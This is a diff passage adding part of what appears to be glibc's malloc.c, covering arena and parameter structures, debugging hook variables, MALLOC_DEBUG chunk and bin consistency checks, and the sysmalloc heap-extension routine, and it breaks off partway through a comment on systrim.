+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
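+
+/* perturb_byte is normally set from the MALLOC_PERTURB_ environment
+   variable or with mallopt (M_PERTURB).  When nonzero, freshly
+   allocated memory is filled with perturb_byte ^ 0xff and freed memory
+   with perturb_byte, which helps expose reads of uninitialized or
+   freed memory during testing.  */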
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (p) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders free chunks and debugging is on, those
+     neighboring free chunks are worth checking as well.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum), this only
+         happens for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
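+              /* For example, if MALLOC_ALIGNMENT were 32 rather than
+                 2 * SIZE_SZ on a 64-bit build, a page-aligned mapping
+                 mm would give front_misalign == 16, so p would be
+                 mm + 16 with prev_size (p) == 16, and munmap_chunk ()
+                 recovers the mapping base as p - prev_size (p).  */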
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
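+                  /* Each fencepost takes 2 * SIZE_SZ bytes, so the
+                     pair consumes 4 * SIZE_SZ bytes (MINSIZE in the
+                     usual configuration), which is why old_size is
+                     shrunk by 4 * SIZE_SZ (rounded down to a
+                     MALLOC_ALIGNMENT multiple) below.  */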
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
